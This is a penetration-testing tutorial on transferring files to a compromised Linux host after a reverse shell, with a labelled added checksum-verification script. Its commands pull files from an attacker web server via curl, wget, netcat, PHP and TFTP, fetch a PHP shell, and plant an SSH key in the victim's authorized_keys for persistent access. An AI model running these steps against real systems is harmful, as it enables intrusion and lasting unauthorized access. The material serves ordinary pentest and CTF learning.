
Get the Door - It's Transferring files on Linux after getting a reverse shell.

Updated: Mar 3, 2022

Set Up Simple Python Webserver


For these examples, we use the curl and wget commands to download a file from our web server. Python offers a simple way to set up a web server: the command below makes the whole folder you run it from available on port 9999. SimpleHTTPServer is the Python 2 module name; on Python 3 the same server is the http.server module.

First, navigate to the folder you want to host on the network/internet.

python -m SimpleHTTPServer 9999


You can also use the apache2 server.

Use this command to start the Apache server:

service apache2 start

This will host the /var/www/html folder on the default port 80.


Curl

On the target device, you can download files using curl like this:

curl -O http://192.168.0.101/file.txt


Wget

On the target device, you can download files using wget like this:

wget 192.168.1.102:9999/file.txt


Netcat

One of the ways to transfer files between devices is by using Netcat.

If you don't have an interactive shell, it is risky to start listening on a port on the target, because the attacking machine may be unable to connect to that port. You are then left with nothing, and you can't press Ctrl-C because that would kill your session on the target machine.

So instead, connect out from the target device. The listener that serves the file runs on the attacking device, and both sides must use the same port.

On the attacking device:

nc -lvp 4444 < file

On the target device:

nc 192.168.185.103 4444 > file

You can also do it the risky way.

On the target device, we run nc like this:

nc -lvp 1234 > enum.sh

And on the attacking device we send the file to the same port like this:

nc 192.168.185.103 1234 < enum.sh

Sometimes you will get this error:

This is nc from the netcat-openbsd package. An alternative nc is available

In that case, run this command instead:

nc -l 1234 > file.sh


With PHP

echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.185.103/file', 'r')); ?>" > down2.php


Ftp

If you have access to an FTP client you can use that, but remember: if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted.

Connect to the FTP server using your username and password.

ftp TargetIPAddress

Navigate to the desired directory on the FTP server where you want to upload the file:

put c:\files\file1.txt

where "c:\files\file1.txt" is the path to your file.
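
An added example, not part of the original post: a way to confirm that a file arrived intact after any of the transfers on this page, shown catching the kind of corruption an ASCII-mode FTP transfer causes. The function names, the `tr`-based stand-in for ASCII-mode line-ending translation and the sample bytes are constructed for illustration.

```shell
#!/bin/sh
# Added example: detect a transfer that altered a file by comparing SHA-256 digests.

# Print the SHA-256 hex digest of a file (sha256sum on Linux, shasum elsewhere).
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d ' ' -f 1
    else
        shasum -a 256 "$1" | cut -d ' ' -f 1
    fi
}

# verify_transfer FILE EXPECTED_HEX: status 0 if the digest matches, 1 otherwise.
verify_transfer() {
    actual=$(file_sha256 "$1")
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    [ -n "$actual" ] && [ "$actual" = "$expected" ] && return 0
    echo "MISMATCH $1: expected $expected, got ${actual:-nothing}" >&2
    return 1
}

# Simplified stand-in for an ASCII-mode transfer (assumption: it models CR LF
# being rewritten to LF; in the sample below CR only ever appears before LF).
simulate_ascii_mode() {
    tr -d '\r' < "$1" > "$2"
}

# Constructed sample "binary": ELF magic followed by bytes that contain CR LF.
demo() {
    dir=$(mktemp -d) || return 2
    printf '\177ELF\001\002\r\n\001\377payload\r\n' > "$dir/orig.bin"
    want=$(file_sha256 "$dir/orig.bin")
    cp "$dir/orig.bin" "$dir/binary_mode.bin"   # byte-for-byte copy
    simulate_ascii_mode "$dir/orig.bin" "$dir/ascii_mode.bin"
    result=""
    for f in binary_mode.bin ascii_mode.bin; do
        if verify_transfer "$dir/$f" "$want" 2>/dev/null; then
            result="$result$f=ok "
        else
            result="$result$f=corrupt "
        fi
    done
    rm -rf "$dir"
    printf '%s\n' "${result% }"
}

demo
```

In practice, run file_sha256 on the sending machine and pass that digest to verify_transfer on the receiving machine.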



Tftp

On some machines, we do not have access to nc, wget or curl, but we might have access to TFTP. Some versions of TFTP can be used to download files remotely, like this:

$ tftp 192.168.69.101
tftp> get yourfile.txt

If you can't run it, for whatever reason, you can also adopt a different approach:

tftp 192.168.185.103 <<< "get shell7878.php shell7878.php"


SCP

Now we can copy files to a machine using SCP (WOW)

# Copy a file:
scp /path/to/source/file.ext username@192.168.69.101:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@192.168.69.101:/path/to/destination



SSH - SCP

If you manage to upload a reverse shell and obtain access to the machine, you may be able to log in using SSH, which gives you a far better and more stable shell along with all the other features of SSH, such as transferring files.

In the /home/user directory you can find the hidden .ssh directory by typing ls -la

Now do these two things:

1. Create a new keypair

	ssh-keygen -t rsa -C "your_email@example.com"

Then enter a name for the key (MyKey here) and a passphrase when prompted:

Enter file in which to save the key (/root/.ssh/id_rsa): MyKey
Enter passphrase (empty for no passphrase):
Enter same passphrase again:

This will create two files, one called MyKey and another called MyKey.pub. The file ending in .pub is your public key, and the other file is your private key.


2. Add your public key to authorized_keys

Now copy the content of MyKey.pub. On the compromised machine, go to ~/.ssh and add the public key to the file authorized_keys. The key must be on a single line, and >> appends to the file instead of overwriting keys that are already there. Like this:

echo "ssh-rsa SDF456SGD464gg6FSAASF424GJKX3XKQFT4er99s/dhtiwp6b5fhsdh35vj96hf5jbas531ae5t4ng5+dsgh54wr4w45w/kZ4Vdv..." >> authorized_keys

Now log in to the target machine from your host machine.

ssh -i MyKey user@192.168.69.103